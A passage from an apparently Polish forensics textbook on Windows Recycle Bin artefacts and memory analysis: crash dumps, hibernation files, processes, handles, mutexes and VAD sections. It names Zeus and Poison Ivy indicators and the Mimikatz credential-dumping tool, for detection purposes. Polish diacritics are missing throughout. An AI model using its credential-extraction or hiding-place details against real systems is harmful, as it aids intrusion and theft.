Nie mamy miejsca na dokadny opis struktury list szybkiego dostpu, ale istnieje kilka darmowych
narzdzi, za pomoc ktrych mona je przetwarza i dekodowa. Poniej przedstawiamy dwa z nich.
W INTERNECIE
JumpLister firmy WoanWare www.woanware.co.uk/forensics/jumplister.html
JumpListParser (jmp) firmy TZWorks tzworks.net/prototype_page.php?proto_id=20
Kosz
Kosz to magazyn do tymczasowego przechowywania plikw usunitych przez uytkownika za
pomoc Eksploratora Windows. Ta wprowadzona w systemie Windows 95 funkcja umoliwia
uytkownikowi, ktry zmieni zdanie, przywrcenie usunitego pliku, zanim zostanie
bezpowrotnie skasowany z dysku. Istnieje jednak moliwo pominicia Kosza. Wystarczy przed
naciniciem klawisza Del nacisn i przytrzyma klawisz Shift, aby plik zosta od razu usunity
naprawd. Jako e Kosz to tylko zbir katalogw o specyficznych uprawnieniach i prawach
dostpu, odtworzenie jego zawartoci nie sprawi analitykowi adnego problemu.
Dowody
W systemach plikw NTFS Kosz jest tworzony dla kadego woluminu osobno w nastpujcych
lokalizacjach:
Windows XP i Server 2003 \Recycler
Windows Vista, 7 i Server 2008 \$Recycle.Bin
System Windows nie wcza funkcji Kosza dla urzdze wymiennych, do ktrych zaliczaj si
m.in. pamici USB, ale zewntrzne dyski twarde maj wasny kosz w katalogach wymienionych
powyej (pod warunkiem, e s sformatowane w systemie plikw NTFS).
W systemie Windows Vista i nowszych struktura Kosza ulega znacznym modyfikacjom,
ale niektre cechy s niezmienne we wszystkich wersjach tego systemu operacyjnego. Zarwno
\Recycler\, jak i \$Recycle.Bin\ to katalogi ukryte, z ktrych kady ma podkatalogi odpowiadajce
kademu identyfikatorowi SID konta, ktre korzystao z Kosza. Uprawnienia NTFS tych folderw
mog uniemoliwia uytkownikom przegldanie usunitych plikw innych uytkownikw.
Gdy kto otwiera Kosz za pomoc Eksploratora Windows lub przez kliknicie ikony kosza na
pulpicie, w rzeczywistoci przechodzi do podkatalogu powizanego ze swoim identyfikatorem SID,
a nie gwnego. Na rysunku 12.28 przedstawiono zestawienie rnic midzy ciekami i stosowanymi
nazwami w Koszach w rnych wersjach systemu Windows.
Analiza
Aby przeanalizowa materia dowodowy z Kosza, naley wiedzie, co si dzieje w systemie,
w momencie gdy uytkownik usunie plik, ktry trafia do Kosza. W tym miejscu dowiesz si, jak
odzyska rne artefakty i metadane dostpne w Koszu w systemach Windows XP i Server 2003
oraz nowszych. Na koniec opisujemy metody, jakie hakerzy stosuj w celu wykorzystania Kosza
jako katalogu przerzutowego oraz przedstawiamy krtk list narzdzi polecanych do analizy
artefaktw z Kosza.
RYSUNEK 12.28. Porwnanie Kosza w systemach Windows XP i Server 2003 (na grze) z Koszem w systemach
Analiza katalogu \Recycler

Gdy do Kosza trafia plik, system Windows zmienia jego nazw wg nastpujcego wzoru:
D<LiteraNapdu><Indeks#>.<RozszerzeniePliku>
D to niezmienna litera, ktra jest dodawana na pocztku kadej nazwy pliku.
<LiteraNapdu> oznacza wolumin, z ktrego usunito plik.
<Indeks#> to liczba usunitych plikw aktualnie znajdujcych si w Koszu. Warto ta jest
zwikszana po kadym usuniciu pliku lub folderu oraz zerowana po oprnieniu Kosza
i ponownym uruchomieniu systemu.
<RozszerzeniePliku> to rozszerzenie oryginalnego pliku, ktry zosta usunity.
Powiedzmy np., e Bartek oprni Kosz w swoim systemie Windows XP, ponownie uruchomi
komputer, a nastpnie usun plik C:\hax\TracerT.txt. Plik ten zostaby przemianowany i przeniesiony
do Kosza C:\Recycler\[SID Bartka]\DC1.txt (C to nazwa woluminu rdowego, 1 to indeks, a .txt
to oryginalne rozszerzenie usunitego pliku). Gdyby nastpnie Bartek usun plik C:\tools\nmap.exe,
zostaby on przemianowany nastpujco: C:\Recycler\<SID Bartka>\DC2.exe.
Jak system Windows zmienia nazw pliku przywracanego z Kosza do pierwotnej lokalizacji?
Za kadym razem, gdy do Kosza dodawany jest jaki plik, w ukrytym pliku o nazwie
\Recycler\<SID>\INFO2 zostaj zapisane jego metadane. Plik INFO2 zawiera nastpujce
informacje na temat kadego znajdujcego si w Koszu pliku:
rozmiar fizyczny (a nie logiczny) pliku,
dat i godzin usunicia pliku (UTC),
oryginaln nazw i ciek pliku.
Dziki temu wystarczy szybko przejrze plik INFO2, aby pozna zawarto Kosza na dowolnym
woluminie NTFS. Dalej przedstawilimy kilka narzdzi sucych do pobierania i analizowania
tych plikw.
Co w takim razie si stanie, gdy uytkownik wyle do Kosza katalog z plikami? Wwczas
system Windows utworzy folder o nazwie \Recycler\<SID>\DC#, gdzie # reprezentuje aktualn
warto indeksow Kosza. Zawarto oryginalnego katalogu zostanie przeniesiona w to miejsce,
ale zachowa oryginalne nazwy plikw i nie zostanie uwzgldniona w pliku INFO2. Wracajc do
poprzedniego przykadu, jeeli Bartek usunie folder C:\secrets\ zawierajcy plik MyPasswords.xlsx,
system Windows utworzy plik \Recycler\<SID Bartka>\DC3\MyPasswords.xlsx.
Analiza pliku \$Recycle.Bin

W systemie Windows Vista zmieniy si cieki i sposoby nadawania nazw w Koszu, ale wszystko,
co pozostao, jest bardzo podobne do implementacji stosowanej w poprzednich wersjach systemu.
Dla kadego pliku wysyanego do Kosza system Windows tworzy dwa pliki:
\$Recycle.Bin\<SID>\$I<ID_TEKSTOWY>.<RozszerzeniePliku>,
\$Recycle.Bin\<SID>\$R<ID_TEKSTOWY>.<RozszerzeniePliku>.
Pliki $I i $R stanowi nierozczn par. Kady z nich ma taki sam identyfikator tekstowy. Jest to
szecioznakowy acuch generowany dla kadego pliku wysanego do Kosza. Jak mona si
spodziewa, czon <RozszerzeniePliku> reprezentuje oryginalne rozszerzenie usunitego pliku.
Plik $R to przemianowana kopia usunitego pliku utworzona wg schematu podobnego do
schematu plikw DC# w starszych wersjach systemu Windows. Plik $I zastpuje plik INFO2 jako
rdo metadanych zawiera nazw oryginalnego pliku, ciek do niego oraz dat i godzin
usunicia powizanego z nim pliku $R. Sposb traktowania usuwanych folderw rwnie jest
podobny do poprzedniego jeli $R reprezentuje usunity folder, to znajdujce si w nim pliki
zachowuj swoje oryginalne nazwy.
Nienormalne sposoby uycia Kosza

Hakerzy czsto przechowuj szkodliwe programy, narzdzia i skradzione dane w katalogu
gwnym Kosza (\Recycler lub \$Recycler.Bin). Przypominamy, e Kosz jest katalogiem ukrytym
i Eksplorator Windows zawsze kieruje uytkownika do podkatalogu o nazwie zbienej
z identyfikatorem SID tego uytkownika. W katalogu gwnym nigdy nie powinno by adnych
plikw (z wyjtkiem desktop.ini). Jako e prawie nikt nie sprawdza, czy co tam jest, miejsce to
stao si doskona skrytk.
Podczas prowadzonych ledztw bardzo czsto sprawdzamy zawarto katalogw \Recycler
i \$Recycler.Bin zarwno w pojedynczych systemach, jak i na wiksz skal w caych rodowiskach.
Kady mechanizm utrwalania wskazujcy plik wykonywalny lub bibliotek w katalogu gwnym
Kosza powinno si traktowa podejrzliwie. Naley jednak wiedzie, e niektre sabej jakoci aplikacje
take mog pozostawia w tym katalogu nieszkodliwe, ale gronie wygldajce pozostaoci.
Wielokrotnie widzielimy programy, ktre nieprawidowo usuwajc pliki, przenosiy je
do katalogu gwnego Kosza.
Narzdzia do analizy Kosza

Nie ma wielu specjalistycznych narzdzi do analizowania artefaktw z Kosza, ale wystarczy choby
jedno, tylko skuteczne. Dlatego najczciej korzystamy z programu rifiuti2 (code.google.com/p/rifiuti2/).
Jest to wietna otwarta aplikacja z funkcj analizy plikw INFO2 i $I. A jeli kto korzysta z komercyjnych
rozwiza, funkcje interpretacji plikw metadanych Kosza maj programy EnCase i FTK.
PAMI
Do tej pory koncentrowalimy si na dowodach nieulotnych, czyli takich, ktre mona pobra
zarwno z obrazw dyskw, jak i dziaajcych systemw. Jednak system Windows zapisuje te
wiele cennych artefaktw w pamici, wic ich pobranie moliwe jest wycznie w czasie jego
dziaania. Wprawdzie do wielu z tych ladw mona si dosta za pomoc API systemu Windows,
jednak najbardziej niezawodnym i najbezpieczniejszym sposobem jest ich bezporednie
przeanalizowanie i odtworzenie z pamici.
Jakiego rodzaju informacje zawiera pami? Lista przydatnych rzeczy jest duga i wraz z rozwojem
metod informatyki ledczej cigle dodawane s do niej nowe pozycje. Oto niektre z nich:
dziaajce procesy oraz obiekty i zasoby systemowe, z ktrymi procesy te wsppracuj;
aktywne poczenia sieciowe;
zaadowane sterowniki;
dane powiadczajce tosamo uytkownikw (mog by zaszyfrowane, zaciemnione albo
mog wystpowa w postaci zwykego tekstu);
fragmenty nieulotnych rde danych, takich jak rejestr, dzienniki zdarze i tabela MFT;
pozostaoci wczeniej wykonywanych polece konsoli;
resztki danych tekstowych, ktre na dysku wystpuj w formie zaszyfrowanej;
wane struktury danych w obrbie jdra, dziki ktrym mona uzyska wgld w obsug,
zachowanie i wykonywanie procesw.
Analiza ledcza pamici, podobnie jak systemu plikw NTFS i rejestru systemu Windows, to
skomplikowany temat, o ktrym bez trudu mona by napisa ca ksik. Dlatego w podrozdziale
tym opisujemy najwaniejsze skadniki pamici oraz to, co naley pobra do analizy. Pniej
przedstawiamy kilka artefaktw, ktre mona wydoby z pamici, np. dziaajce procesy, uchwyty
i sekcje pamici. Na koniec opisujemy pewne zaawansowane techniki hakerskie, takie jak
wstrzykiwanie procesw, ktre mona skutecznie przeanalizowa, tylko badajc pami.
Dowody
Tak jak wikszo nowoczesnych systemw operacyjnych, system Windows zawiera podsystem
pamici wirtualnej, ktry moe wykorzystywa zarwno pami RAM, jak i dysk twardy jako jedno
rdo pamici dla uruchamianych przez siebie procesw. Pami w systemie Windows jest wic
kompozycj dwch skadnikw pamici fizycznej i pliku stronicowania. Najpierw wic opisujemy
struktur kadego z tych wanych rde i sposb pobierania z nich danych. Ponadto powicamy
nieco miejsca jeszcze dwm innym rdom zwizanym z pamici zrzutom awaryjnym
i plikowi hibernacji ktre rwnie mona spotka podczas analizowania systemw Windows.
Pami fizyczna
Termin pami fizyczna oznacza po prostu zawarto pamici RAM. Mona j zdoby przez
utworzenie jej obrazu zasadniczo chodzi o to samo, co przy tworzeniu obrazu dysku twardego
(cho robi si to cakiem inaczej). Jeli w komputerze znajduj si 4 GB pamici RAM, obraz
pamici fizycznej bdzie mia dokadnie taki rozmiar.
Do pobierania pamici z systemu Windows najczciej uywa si specjalnych programw,
podobnie jak przy szukaniu danych podczas analizy na ywo i innych czynnoci ledczych.
Wikszo aplikacji z dziedziny informatyki ledczej mona uruchamia w trybie przenonym
(tzn. na napdzie USB), a nawet przez sie przy uyciu wczeniej zainstalowanego agenta. Niektre
pakiety umoliwiaj te pobieranie zawartoci pamici fizycznej przez poczenie Firewire
(IEEE 1394), ktre ma bezporedni dostp do pamici. Niestety popularno portw Firewire
wrd uytkownikw komputerw z systemem Windows stale spada.
Powiedzmy, e mamy ju obraz pamici. Co dalej? Kilkanacie lat temu najbardziej
zaawansowan technicznie metod byo poszukanie w obrazie acuchw tekstu w nadziei,
e uda si co wykry.
Na szczcie od tamtej pory techniki ledcze znacznie si rozwiny. Teraz mamy do dyspozycji
takie narzdzia jak Volatility Framework i Redline, za pomoc ktrych mona analizowa obrazy
pamici, rozpracowywa wewntrzne struktury zwizane z procesami obszaru uytkownika i jdra
oraz zapisywa je w formacie czytelnym dla czowieka. Na rysunku 12.29 przedstawiono te moliwoci
w postaci schematu. Moemy przeglda wiele artefaktw, np. szczegowe listy procesw i obiektw
adowanych przez kady proces. W punkcie Analiza pamici opisalimy, jak przeglda te
przetworzone struktury oraz narzdzia, ktre do tego su.
RYSUNEK 12.29. Narzdzia do analizy pamici umoliwiaj przetwarzanie zawartoci pamici fizycznej
i wydobywanie z niej takich struktur jak dziaajce procesy oraz wspierajce je zasoby z przestrzeni
uytkownika i jdra
Plik stronicowania
Plik stronicowania to podstawowy skadnik architektury pamici w wikszoci nowoczesnych
systemw operacyjnych. Stanowi on zapasowe miejsce do przechowywania danych i z reguy
jest umiejscowiony na wolniejszym staym dysku. W pliku tym przechowywane s potrzebne
dziaajcym procesom dane, ktre nie zmieciy si w pamici fizycznej. Na szczcie dla
programistw aplikacji wszystkie zwizane z tym czynnoci s wykonywane bez ich wiedzy przez
procedury obsugi pamici jdra. Kademu procesowi uruchomionemu przez uytkownika
przydzielana jest pewna ilo pamici wirtualnej (przedzia adresw) do dyspozycji. Jdro
prowadzi tabel, w ktrej rejestruje, gdzie znajduje si kada strona pamici wirtualnej adres
prawdziwej pamici lub w obrbie pliku stronicowania oraz przesya dane w t i z powrotem,
zgodnie z zapotrzebowaniem. Gdy koczy si pami RAM, zwiksza si czstotliwo wykonywania
czynnoci zwizanych ze stronicowaniem, co niekorzystnie wpywa na szybko dziaania systemu.
Plik stronicowania jest wykorzystywany nie tylko przez aplikacje uytkownika, poniewa take
cz pamici wirtualnej jdra moe podlega stronicowaniu. Na rysunku 12.30 przedstawiono
bardzo oglny przegld relacji czcych pami wirtualn, plik stronicowania oraz pami
fizyczn. Naley podkreli, e dane nalece do przestrzeni pamici wirtualnej dowolnego
procesu nie musz zajmowa cigego obszaru pliku stronicowania lub pamici fizycznej.
RYSUNEK 12.30. Pami wirtualna, plik stronicowania i pami fizyczna
W systemie Windows domylnie plik stronicowania to %SYSTEMDRIVE%\pagefile.sys, ale jego

nazw i lokalizacj mona zmieni na dowolny wolumin, a nawet mona go podzieli na kilka plikw.
Jeeli nie ma tego pliku w domylnej lokalizacji, naley sprawdzi jego ciek w kluczu rejestru
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PagingFiles.
Plik stronicowania jest ukryty i w uruchomionym komputerze chroniony przez system

operacyjny. Jeli kto sprbuje skopiowa go za pomoc Eksploratora Windows lub wiersza
polece, obejrzy tylko bd braku dostpu. Aby skopiowa ten plik z dziaajcego systemu,
naley posuy si specjalnym programem z dostpem do surowego dysku.
Zrzuty awaryjne
Gdy dojdzie do awarii, system Windows automatycznie tworzy pliki zrzutu awaryjnego
zawierajce cz lub ca zawarto pamici. Mona je wykorzysta jak rodzaj czarnej skrzynki
pomocnej programistom do znalezienia bdu i rozwizania problemu, ktry spowodowa awari.
Czasami do destabilizacji systemu doprowadzaj le napisane wirusy, zwaszcza szkodliwe
sterowniki urzdze.
System Windows rejestruje dane awaryjne na trzech rnych poziomach. Do dotyczcych ich
ustawie mona dosta si przez skrt Zaawansowane ustawienia systemu w Panelu sterowania
naley przej na kart Zaawansowane, a nastpnie w czci Uruchamianie i odzyskiwanie
klikn przycisk Ustawienia. Ewentualnie modyfikacj tych ustawie mona te wykona
w kluczach rejestru, co opisano poniej.
Zrzut pamici jdra jest to domylne ustawienie w systemach Windows, Vista, 7,
Server 2008 i nowszych. Obejmuje ono wszystkie strony odczytu i zapisu jdra istniejce
w czasie awarii oraz list procesw i zaadowanych sterownikw. Rozmiar tego pliku moe
si zmienia w zalenoci od iloci pamici w systemie, ale zazwyczaj waha si w granicach
od kilkudziesiciu do kilkuset megabajtw.
May zrzut pamici ustawienie to obejmuje ograniczon ilo danych, takich jak
zaadowane sterowniki, kontekst procesora, stos wywoa jdra oraz metadane dotyczce
zatrzymanego procesu i wtku. Pliki te najczciej maj rozmiar poniej 5 MB i domylnie s
zapisywane w katalogu %SYSTEMROOT%\Minidump\. ciek t mona zmieni w wartoci
rejestru HKLM\SYSTEM\CurrentControlSet\Control\CrashControl\MinidumpDir.
Peny zrzut pamici ta opcja powoduje utworzenie kompletnego obrazu pamici fizycznej.
Pliki powinny mie rozmiar odpowiadajcy iloci pamici zamontowanej w komputerze.
Ustawienie to jest niedostpne w oknie dialogowym Uruchamianie i odzyskiwanie, ale mona
je wczy przez ustawienie wartoci rejestru HKLM\SYSTEM\CurrentControlSet\Control\
CrashControl\CrashDumpEnabled na 1. Pene zrzuty pamici domylnie s zapisywane
w pliku %SYSTEMROOT%\memory.dmp, ale mona to zmieni w wartoci rejestru
HKLM\SYSTEM\CurrentControlSet\Control\CrashControl\DumpFile.
Uwaga W systemach Windows Vista i Server 2008 oraz nowszych zrzuty awaryjne dotyczce aplikacji
uytkownika moe zapisywa funkcja Raportowanie bdw systemu Windows. Pliki te s
przechowywane w katalogu %LOCALAPPDATA%\CrashDumps oraz mog by konfigurowane
za pomoc klucza rejestru HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\
LocalDumps.
Wykonywanie penych zrzutw awaryjnych pamici wcza si rzadko, ale kady, kto trafi
na taki zrzut, moe uwaa si za szczciarza. Narzdzia do analizy pamici, np. Volatility
Framework i Moonsols Windows Memory Toolkit, potrafi przetwarza te zrzuty tak, jak
normalne obrazy pamici. Dysponujc plikami jdra i maych zrzutw, mamy znacznie bardziej
ograniczone moliwoci. Programici i analitycy wirusw najczciej do przegldania tych plikw
wykorzystuj macierzysty debugger systemu Windows o nazwie WinDbg.
Pliki hibernacji
Firma Microsoft wprowadzia funkcj hibernacji systemu w systemie Windows 98. Suy ona
do zachowywania stanu dziaajcego systemu przy jednoczesnym zmniejszeniu zuycia energii
do minimum. Jej dziaanie polega na tym, e najpierw zapisuje ca zawarto pamici na dysku,
a nastpnie wycza system. Przy wczaniu systemu plik hibernacji zostaje odczytany i jego
zawarto przeniesiona z powrotem do pamici, dziki czemu uytkownik otrzymuje z powrotem
nienaruszon poprzedni sesj. Domylna cieka do pliku hibernacji to
%SYSTEMDRIVE%\Hiberfil.sys.
Jeli wyglda Ci to na wykonywanie obrazu pamici, masz dobre przeczucie! Nie naley jednak
sdzi, e plik hibernacji to to samo, co surowa pami fizyczna jest skompresowany i zawiera
troch dodatkowych metadanych. W efekcie, jeli pobierze si plik hibernacji z systemu, naley go
potem przekonwertowa na format czytelny dla narzdzi ledczych. Mona do tego uy np. wtyczki
imagecopy do programu Volatility Framework, ktra zamienia pliki hibernacji na standardowe
obrazy pamici.
Analiza pamici
Opisalimy rda dowodw pamiciowych dostpne w systemie Windows, wic teraz moemy
przyjrze si metodom ich analizy. Najpierw przedstawiamy kilka najwaniejszych technikach
analitycznych, a nastpnie opisujemy niektre metody ataku z wykorzystaniem pamici stosowane
przez programistw wirusw.
Procesy
Mwic najprociej, z listy procesw mona si dowiedzie, co dziaa w systemie. Kady, kto
kiedykolwiek korzysta z Menedera zada lub narzdzi SysInternals Process Explorer i pslist,
widzia list procesw pobran za pomoc interfejsu API systemu Windows. Analizujc pami,
mona odtworzy te same dane poprzez zbadanie struktur danych jdra zwanych blokami
EPROCESS, ktre zawieraj informacje o wszystkich procesach uruchomionych w systemie.
Jeeli haker zastosowa technik typu rootkit, np. przechwytywanie (ang. hooking) lub szperanie
w obiekcie jdra w celu ukrycia procesu przed normalnymi funkcjami interfejsu API Windows,
z listy procesw odtworzonej w ten sposb mona otrzyma pene informacje o procesach.
Narzdzia do analizy ledczej pamici z listy blokw EPROCESS najczciej wydobywaj

nastpujce informacje.
Identyfikator procesu (PID) identyfikator numeryczny przypisany procesowi podczas
uruchamiania.
PID procesu nadrzdnego identyfikator procesu, ktry spowodowa uruchomienie
danego procesu.
Nazwa procesu nazwa pliku wykonywalnego.
cieka procesu pena cieka do pliku wykonywalnego.
Wiersz polece procesu parametry przekazane do wiersza polece pliku wykonywalnego.
Czas uruchomienia i zamknicia procesu jeli dostpne.
Liczba wtkw i uchwytw.
Na rysunku 12.31 przedstawiono typowe wyniki zwrcone przez wtyczk pslist programu
Volatility Framework. czc dane z blokw EPROCESS z danymi z innych rde z jdra, mona
zrekonstruowa SID lub nazw uytkownika, pod ktr dziaa dany proces. Wicej informacji
na temat tej techniki mona znale na poniszej stronie internetowej.
W INTERNECIE
moyix.blogspot.com/2008/08/linking-processes-to-users.html
RYSUNEK 12.31. Wyniki zwrcone przez wtyczk pslist programu Volatility Framework
Naley pamita, e procesy rejestruj tylko identyfikator PID procesu nadrzdnego, bez nazwy
i cieki. To narzdzie analityczne musi przejrze wszystkie identyfikatory i okreli relacje
hierarchiczne midzy procesami. Dlatego wanie te nie da si okreli rodzica procesu, ktry
zakoczy dziaanie identyfikator procesu nadrzdnego nie da si powiza z niczym,
co aktualnie dziaa.
Uchwyty
Kady programista wie, e uchwyty su jako warstwa abstrakcji umoliwiajca aplikacjom
uytkownika uzyskiwanie poredniego dostpu do obiektw systemu Windows (np. plikw,
kluczy rejestru, tokenw zabezpiecze, wtkw itd.). Gdy aplikacja wywouje funkcj z API
Windows w celu interakcji z jakim obiektem np. aby otworzy plik wcza si meneder
obiektw jdra, ktry nadzoruje t operacj. Kady dziaajcy proces ma przechowywan w pamici
jdra tablic uchwytw, w ktrej zapisywane s wszystkie aktualnie posiadane przez niego uchwyty.
Przegldajc zawarto tej tablicy, mona wic odkry wszystkie uchwyty, ich typy oraz
odpowiadajce im obiekty.
Uwaga Popularny pakiet narzdzi dla systemu Windows o nazwie SysInternals zawiera prost aplikacj
o nazwie handle, za pomoc ktrej mona wywietli list wszystkich otwartych uchwytw
wszystkich dziaajcych procesw. Jest to szybki program, ktry do dziaania potrzebuje tylko
wiersza polece z uprawnieniami administratora. Take aplikacja SysInternals Process Explorer
umoliwia wywietlenie listy uchwytw w dziaajcym systemie. Naley jednak podkreli, e oba
te narzdzia wykorzystuj interfejs API systemu Windows, a nie pobieraj danych z surowej pamici.
Z danych dotyczcych uchwytw mona dowiedzie si szczegw na temat sposobu dziaania

programu jakie pliki odczytuje, w jakich plikach zapisuje dane, jakich uywa kluczy rejestru,
z ktrymi urzdzeniami si komunikuje itd. S to bezcenne informacje, gdy trzeba sprawdzi,
czy podejrzany proces jest legalny, czy szkodliwy. Na rysunku 12.32 pokazano uchwyty znalezione
przez program Redline w systemie zainfekowanym wirusem Zeus. Uchwyty sdra64.exe i local.ds
procesu winlogon.exe s charakterystyczne wanie dla tego szkodliwego programu.
RYSUNEK 12.32. Uchwyty z systemu zainfekowanego wirusem Zeus w programie Redline
Oczywicie aplikacja nie musi cay czas trzyma otwartego uchwytu do wykorzystywanego
przez siebie zasobu. Przykadowo programy rejestrujce naciskane klawisze mog buforowa
zdobyte dane w pamici i tylko co pewien czas przesya je do pliku. Dlatego list uchwytw,
tak jak kade inne ulotne rdo dowodw, naley traktowa jako wgld w wybrany moment
dziaalnoci pliku wykonywalnego.
Jednym z rodzajw uchwytw najczciej spotykanych podczas badania szkodliwych

programw jest tzw. mutant (muteks lub obiekt wzajemnego wykluczania). Dziaanie muteksu
mona porwna z rezerwacj jeli co zostanie zarezerwowane, nikt inny nie moe tego uywa,
dopki tego nie zwolnimy. Aplikacje tworz w pamici muteksy w celu koordynowania dostpu
do wsplnych zasobw. Technika ta jest zwykle wykorzystywana przez programy wielowtkowe,
ktre tworz nazwane muteksy i otwieraj uchwyty do nich w celu zaznaczenia, e dany zasb jest
zablokowany. Inne wtki potrzebujce dostpu do tego zasobu musz najpierw otworzy uchwyt
do niego i poczeka, a zostanie zwolniony. Nazwane muteksy to najczciej proste acuchy.
Szkodliwe programy zwaszcza botnety i inne rodzaje wirusw dziaajce na masow skal
czasami ustawiaj i sprawdzaj nazwane muteksy, aby zapobiec wielokrotnemu infekowaniu
jednego systemu (lub by sprawdzi, czy kod jest aktualny). Przykadowo wczesne wersje Zeusa
podczas instalacji tworzyy muteks o nazwie _AVIRA_2109 i wyczay j, jeli go wykryy w systemie.
Niesawny backdoor o nazwie Poison Ivy wykorzystuje domylny muteks o nazwie )!VoqA.I4, cho
moe on zosta zmieniony. Sygnatury wielu programw antywirusowych zawieraj te statyczne
muteksy, poniewa za ich pomoc mona atwo wykry znane wirusy. Narzdzia do analizy
pamici, takie jak Redline i Volatility Framework, take umoliwiaj sporzdzenie listy wszystkich
uchwytw do nazwanych muteksw i zidentyfikowanie wrd nich szkodliwych jednostek. Twrcy
nowszych wirusw uodporniaj swoje produkty na takie metody wykrywania przez programowe
generowanie nazw muteksw zamiast wykorzystywa stae acuchy. Na rysunku 12.33 pokazano
uchwyt do domylnego muteksu wirusa Poison Ivy )!VoqA.I4 utworzony przez szkodliwy proces
WINDOWS:wins.exe w programie Redline. Zwr uwag, e plik wins.exe jest uruchomiony jako
alternatywny strumie danych katalogu C:\WINDOWS.
RYSUNEK 12.33. Uchwyt do domylnego muteksu wirusa Poison Ivy
Sekcje
Kady znajdujcy si w pamici proces posiada wasn wirtualn przestrze adresow, ktra
zasadniczo jest przedziaem adresw przydzielonym przez menedera pamici na potrzeby odczytu
i zapisu danych oraz wykonywania kodu przez proces. Przypominamy, e przestrze t nazywamy
wirtualn dlatego, e kada jej cz moe by zlokalizowana zarwno w pamici fizycznej, jak
i w stronie na dysku. Z perspektywy procesu nie ma to znaczenia jest to tylko cigy szereg adresw.
System operacyjny zajmuje si przesyaniem danych do i z pamici fizycznej i udostpnianiem
odpowiednich stron pamici na danie.
Techniki analizy pamici umoliwiaj zbadanie przestrzeni pamiciowej procesu i sprawdzenie,

co jest zaadowane do kadego regionu lub sekcji. Do tego moemy wykorzysta kolejn struktur
danych jdra utrzymywan przez menedera pamici drzewo wirtualnego deskryptora adresw
(ang. Virtual Address Descriptor VAD). Jedna ze zmiennych skadowych struktury EPROCESS
procesu jest wskanikiem do wza gwnego drzewa VAD. Przegldajc wzy tego drzewa binarnego,
mona zidentyfikowa kad sekcj pamici obecn w obrbie przestrzeni adresowej procesu.
Sekcja moe by zmapowana na plik lub zaadowan bibliotek DLL (np. poprzez program
adowania procesw systemu Windows) albo moe reprezentowa dynamiczn tre, tak jak np.
przestrze sterty lub stosu. Wzy drzewa VAD mog te wskazywa zabezpieczenia zastosowane
w danej sekcji np. uprawnienia odczytu, uprawnienia do wykonywania itd. Dokadniejszy opis
drzewa VAD mona znale w artykule pt. The VAD Tree: A process-eye view of physical memory
(Drzewo VAD widok pamici fizycznej z perspektywy procesu) Dolana-Gavitta.
W INTERNECIE
www.dfrws.org/2007/proceedings/p62-dolan-gavitt.pdf
Na rysunku 12.34 pokazano list sekcji pamici procesu w programie Redline. Do czego mona
wykorzysta te informacje? Przykadowo do zidentyfikowania wszystkich bibliotek DLL zaadowanych
przez dziaajcy w pamici proces. Na podstawie przegldu tych bibliotek i importowanych przez
nie funkcji mona wycign wstpne wnioski na temat moliwoci pliku wykonywalnego. Ponadto
mona zbada metadane dyskowe kadego pliku DLL adowanego do pamici, sprawdzi podpisy
cyfrowe, zweryfikowa sumy kontrolne itd. W ten sposb mona wykry szkodliwe biblioteki DLL.
Wiele narzdzi potrafi wydoby lub zrzuci zawarto wybranych sekcji, umoliwiajc analitykowi
odzyskanie czci zmapowanych plikw, bibliotek DLL lub plikw wykonywalnych ze zrzutu
pamici. W kocu analiza sekcji czasami pozwala wykry prby szperania w procesach, takie jak
ukradkowe adowanie bibliotek DLL albo wykonywanie kodu w pamici. Nieco dalej piszemy
szerzej o tych technikach.
RYSUNEK 12.34. Lista sekcji w przestrzeni pamici procesu utworzona i wywietlona w programie Redline
Inne artefakty w pamici

Jak napisalimy na pocztku tego podrozdziau, lista artefaktw, jakie mona wydoby z pamici,
cay czas si wydua, poniewa analitycy znajduj drog inynierii wstecznej coraz to nowe
struktury oraz wzbogacaj swoje narzdzia o nowsze funkcje. Oto kilka dodatkowych rde
dowodw, ktre okazay si przydatne podczas prowadzonych przez nas dochodze.
Poczenia sieciowe poprzez analiz pamici mona zrekonstruowa aktywne
i niedawno zamknite poczenia sieciowe. Podobnych informacji dostarcza narzdzie
wiersza polece netstat. Dane te mog zawiera nazw procesu, adres IP i port rda
i celu, stan poczenia oraz czas utworzenia gniazda.
Zaadowane sterowniki narzdzia do analizy pamici mog identyfikowa struktury jdra
wykorzystywane do rejestracji zaadowanych sterownikw. Szkodliwe sterowniki z zasady
dziaaj ze zwikszonymi uprawnieniami i sigaj do niskopoziomowych skadnikw
systemu operacyjnego, co moe utrudnia czynnoci ledcze zwaszcza wykonywane przy
uyciu interfejsu API Windows. W efekcie czsto trzeba przejrze zaadowane sterowniki,
aby sprawdzi, czy nie ma wrd nich podejrzanych pozycji.
Historia polece niektre procesy systemu Windows przechowuj polecenia
wykonywane w konsoli (np. przez instancj powoki cmd.exe). Dane te mog by cennym
rdem informacji, jeli uda si zdoby obraz pamici krtko po tym, jak haker wykona
polecenia w wierszu polece. W wersjach systemu starszych od Windows Vista dowody
tego typu mona znale w przestrzeni pamiciowej programu csrss.exe (ang. Client Server
Runtime System). Natomiast w Windows Vista i nowszych wersjach informacje te znajduj si
w przestrzeni pamiciowej procesu hosta konsoli conhost.exe. Pakiet Volatility Framework
zawiera dwie wtyczki (consoles i cmdscan) suce do analizowania i pozyskiwania tego
rodzaju materiau dowodowego.
acuchy w pamici jest to bardzo prosta, ale czsto skuteczna technika stosowana na
pocztku ledztwa w celach przesiewowych wikszo narzdzi ledczych ma funkcj
szukania w obrazach pamici sekwencji bajtw i acuchw. Za pomoc tej metody czsto
przeprowadzamy szybkie poszukiwania procesw zwizanych z rozpoznanym zem, ktre
przywiodo nas do danego systemu. Jeeli np. wiadomo, e system kontaktuje si z adresem
www.evil.org, to w razie trudnoci z identyfikacj szkodliwego programu mona poszuka
tego acucha w przestrzeni pamiciowej wszystkich uruchomionych procesw. Jeli co
uda si znale, znaleziony proces i zaadowane przez niego zasoby (np. pliki DLL) powinno
si dokadniej zbada. Oczywicie nie ma gwarancji, e szukany acuch bdzie znajdowa
si w pamici w niezmienionej i niezamaskowanej formie, ale zawsze warto sprbowa.
Dane powiadczajce tosamo zestaw narzdzi Mimikatz potrafi wydoby hasa
do kont systemu Windows zarwno w postaci skrtw, jak i czystego tekstu poprzez
odczytanie i przeanalizowanie zawartoci pamici nalecej do usugi podsystemu lokalnego
uwierzytelniania zabezpiecze (ang. Local Security Authority Subsystem Service LSASS)
najczciej dziaajcego jako program lsass.exe.
W INTERNECIE
blog.gentilkiwi.com/mimikatz
Analiza pliku stronicowania

Jak przeanalizowa zdobyty plik pagefile.sys? Niestety nie ma on okrelonej struktury wewntrznej,
